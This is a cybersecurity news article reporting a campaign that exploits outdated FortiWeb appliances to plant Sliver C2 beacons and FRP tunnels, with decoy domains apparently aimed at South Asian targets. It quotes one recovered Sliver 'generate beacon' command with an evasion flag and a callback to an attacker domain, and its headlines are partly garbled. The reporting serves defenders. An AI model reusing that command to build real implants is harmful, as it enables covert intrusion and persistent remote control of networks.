Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
AiTM Phishing Attacks Target SharePoint, HubSpot, Google
May 2, 2026
Attackers Abuse AppSheet, Netlify, Telegram for Google Facebook
May 2, 2026
cPanelSniper PoC Exploit for cPanel Vulner Disclosed Vulnerability
May 2, 2026
Home/Threats/Threat Actor Exploits FortiWeb, Depl Exploited Multiple
Threats

Threat Actor Exploits FortiWeb, Depl Exploited Multiple

A sophisticated threat actor is actively exploiting multiple outdated FortiWeb appliances to deploy the Sliver Command and Control (C2) framework. This campaign underscores a critical trend:...

David kimber
David kimber
January 5, 2026 3 Min Read
33 0

A sophisticated threat actor is actively exploiting multiple outdated FortiWeb appliances to deploy the Sliver Command and Control (C2) framework. This campaign underscores a critical trend: adversaries increasingly leverage open-source offensive tools for persistent access within compromised networks, often bypassing traditional security defenses. Attackers appear to prioritize unpatched edge devices, effectively transforming them into stable entry points for broader network infiltration

This campaign highlights a concerning trend where adversaries leverage open-source offensive tools to maintain persistent access within compromised networks, often bypassing traditional security defenses.

The attackers appear to prioritize unpatched edge devices, effectively turning them into stable entry points for broader network infiltration.

The infection process primarily involves the exploitation of public-facing vulnerabilities in FortiWeb devices, specifically targeting firmware versions 5.4.202 through 6.1.62.

Although the precise vulnerability used for the FortiWeb compromise remains unconfirmed, the group has also been observed leveraging React2Shell (CVE-2025-55182) in parallel operations.

Once initial access is established, the attackers deploy the Fast Reverse Proxy (FRP) tool to expose local services, creating a direct bridge between the victim’s internal network and the attacker’s external control systems.

FRP (Source – Ctrl-Alt-Int3l)

During routine open-directory threat hunting on Censys, Ctrl-Alt-Int3l analysts identified this malicious infrastructure after discovering exposed Sliver C2 databases and logs.

These exposed assets offered a rare glimpse into the attacker’s operational methods, revealing a cluster of compromised devices beaconing to centralized command servers.

Hosts (Source – Ctrl-Alt-Int3l)

The investigation confirmed that the majority of the victim hosts were running outdated firmware, rendering them highly susceptible to this opportunistic but targeted campaign.

The operational impact is severe, as it grants the threat actor long-term persistence on critical security appliances that are typically trusted by the network.

By embedding the Sliver implant directly onto the firewall, the attackers can potentially monitor traffic and execute privileged commands.

The campaign also demonstrates a strategic focus, with specific indicators pointing toward targets in South Asia, evidenced by the carefully themed decoy infrastructure.

Command and Control Strategy

The threat actor’s infrastructure is built around decoy domains designed to mimic legitimate services. Analysis of the C2 configuration revealed domains such as ns1.ubunutpackages[.]store and ns1.bafairforce[.]army.

These domains hosted fake content, including a “Ubuntu Packages” repository and a “Bangladesh Airforce” recruitment page, to deceive network defenders.

The attackers utilized specific Sliver commands to generate their payloads with evasion capabilities. The following command was retrieved from the logs:

generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60

This configuration sets the beacon to reconnect every 120 seconds and employs a “ubuntu” template to blend in with Linux processes.

The resulting binary was deployed to /bin/.root/system-updater on the compromised FortiWeb devices, further masquerading as a system update utility.​

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVEExploitPatchSecurityThreatVulnerability

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Kimwolf Botnet Hacked 2 Million Devices and Turned User’s

Next Post

Higham Lane School Closed Due to Cyberattack Impacting Staff

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Attackers Abuse CAPTCHA, ClickFix for Cred Tactics Boost
May 1, 2026
DDoS Malware Exploits Jenkins to Attack Source Engine Games
May 1, 2026
DDoS Attack Hits Ubuntu Website & Canonical Web Services
May 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Sarah simpson
Sarah simpson
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Detects Critical MongoDB CVE-

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us